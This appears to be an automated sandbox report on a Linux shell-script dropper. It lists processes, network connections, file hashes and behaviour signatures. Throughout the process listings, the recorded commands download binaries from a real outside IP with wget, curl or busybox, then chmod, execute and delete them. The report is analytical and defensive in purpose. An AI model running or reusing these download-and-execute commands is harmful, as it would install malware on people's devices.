[wget http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]

/bin/chmod

[chmod 777 Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]

/tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt

[./Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]

/bin/rm

[rm Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]

/usr/bin/wget

[wget http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]

/bin/chmod

[chmod 777 Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]

/tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq

[./Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]

/bin/rm

[rm Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]

/usr/bin/wget

[wget http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]

/bin/chmod

[chmod 777 5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]

/tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK

[./5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]

/bin/rm

[rm 5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]

/usr/bin/wget

[wget http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]

/bin/chmod

[chmod 777 RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]

/tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4

[./RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]

/bin/rm

[rm RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]

/usr/bin/wget

[wget http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]

/bin/chmod

[chmod 777 BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]

/tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2

[./BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]

/bin/rm

[rm BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]

/usr/bin/wget

[wget http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]

/bin/chmod

[chmod 777 3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]

/tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI

[./3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]

/bin/rm

[rm 3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]

/usr/bin/wget

[wget http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]

/bin/chmod

[chmod 777 F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]

/tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw

[./F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]

/bin/rm

[rm F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]

Network

Country Destination Domain Proto
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp

Files

/tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-25 01:27

Reported

2024-10-25 01:30

Platform

debian9-mipsel-20240729-en

Max time kernel

60s

Max time network

62s

Command Line

[/tmp/402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO N/A
N/A /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy N/A
N/A /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt N/A
N/A /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM N/A
N/A /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 N/A
N/A /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn N/A
N/A /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK N/A
N/A /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq N/A
N/A /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 N/A
N/A /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI N/A
N/A /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw N/A
N/A /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 N/A
N/A /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj N/A
N/A /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz N/A
N/A /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz N/A
N/A /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj N/A
N/A /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM N/A
N/A /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 N/A
N/A /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn N/A
N/A /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO N/A
N/A /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy N/A
N/A /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt N/A
N/A /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq N/A
N/A /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK N/A
N/A /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 N/A
N/A /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 N/A
N/A /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI N/A
N/A /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM /usr/bin/curl N/A
File opened for modification /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq /usr/bin/curl N/A
File opened for modification /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 /usr/bin/curl N/A
File opened for modification /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn /usr/bin/curl N/A
File opened for modification /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq /usr/bin/curl N/A
File opened for modification /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK /usr/bin/curl N/A
File opened for modification /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw /usr/bin/curl N/A
File opened for modification /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 /usr/bin/curl N/A
File opened for modification /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj /usr/bin/curl N/A
File opened for modification /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI /usr/bin/curl N/A
File opened for modification /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO /usr/bin/curl N/A
File opened for modification /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt /usr/bin/curl N/A
File opened for modification /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK /usr/bin/curl N/A
File opened for modification /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz /usr/bin/curl N/A
File opened for modification /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 /usr/bin/curl N/A
File opened for modification /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn /usr/bin/curl N/A
File opened for modification /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI /usr/bin/curl N/A
File opened for modification /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM /usr/bin/curl N/A
File opened for modification /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 /usr/bin/curl N/A
File opened for modification /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 /usr/bin/curl N/A
File opened for modification /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt /usr/bin/curl N/A
File opened for modification /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy /usr/bin/curl N/A
File opened for modification /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz /usr/bin/curl N/A
File opened for modification /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 /usr/bin/curl N/A
File opened for modification /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw /usr/bin/curl N/A
File opened for modification /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj /usr/bin/curl N/A
File opened for modification /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO /usr/bin/curl N/A
File opened for modification /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy /usr/bin/curl N/A

Processes

/tmp/402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh

[/tmp/402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]

/bin/chmod

[chmod 777 DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]

/tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO

[./DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]

/bin/rm

[rm DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]

/usr/bin/wget

[wget http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]

/bin/chmod

[chmod 777 jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]

/tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy

[./jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]

/bin/rm

[rm jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]

/usr/bin/wget

[wget http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]

/bin/chmod

[chmod 777 Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]

/tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt

[./Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]

/bin/rm

[rm Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]

/usr/bin/wget

[wget http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]

/bin/chmod

[chmod 777 aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]

/tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM

[./aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]

/bin/rm

[rm aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]

/usr/bin/wget

[wget http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]

/bin/chmod

[chmod 777 Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]

/tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2

[./Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]

/bin/rm

[rm Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]

/usr/bin/wget

[wget http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]

/bin/chmod

[chmod 777 KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]

/tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn

[./KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]

/bin/rm

[rm KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]

/usr/bin/wget

[wget http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]

/bin/chmod

[chmod 777 5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]

/tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK

[./5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]

/bin/rm

[rm 5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]

/usr/bin/wget

[wget http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]

/bin/chmod

[chmod 777 Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]

/tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq

[./Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]

/bin/rm

[rm Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]

/usr/bin/wget

[wget http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]

/bin/chmod

[chmod 777 BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]

/tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2

[./BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]

/bin/rm

[rm BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]

/usr/bin/wget

[wget http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]

/bin/chmod

[chmod 777 3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]

/tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI

[./3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]

/bin/rm

[rm 3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]

/usr/bin/wget

[wget http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]

/bin/chmod

[chmod 777 F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]

/tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw

[./F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]

/bin/rm

[rm F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]

/usr/bin/wget

[wget http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]

